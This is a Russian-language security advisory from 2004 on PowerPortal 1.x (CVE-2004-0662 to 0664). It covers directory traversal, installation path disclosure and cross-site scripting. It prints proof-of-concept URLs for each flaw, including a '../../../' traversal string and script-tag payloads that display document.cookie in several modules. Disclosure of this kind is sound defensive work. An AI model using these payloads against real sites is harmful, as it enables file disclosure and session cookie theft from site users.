Несколько уязвимостей в PowerPortal
| Дата публикации: | 29.06.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1286 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2004-0662 CVE-2004-0663 CVE-2004-0664 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Раскрытие системных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | PowerPortal 1.x |
| Уязвимые версии: PowerPortal 1.х
Описание: Уязвимость в PowerPortal позволяет удаленному пользователю просматривать произвольные файлы на системе, выполнять XSS нападение и определить инсталляционный путь. 1. Просмотр файлов: http://[target]/modules.php?name=gallery&files=/../../../2. Раскрытие пути: http://[target]/modules/gallery/resize.php http://[target]/power/modules.php?name=gallery&files=darkbicho3. XSS: http://[target]/modules.php?name =private_messages&file=reply&id='><script>alert(document.cookie);</script> http://[target]/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=se arch_results http://[target]/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results http://[target]/modules.php?name=gallery& files=<script>alert(document.cookie);</script> URL производителя: http://powerportal.sourceforge.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Cross-Site Scripting CuteNews |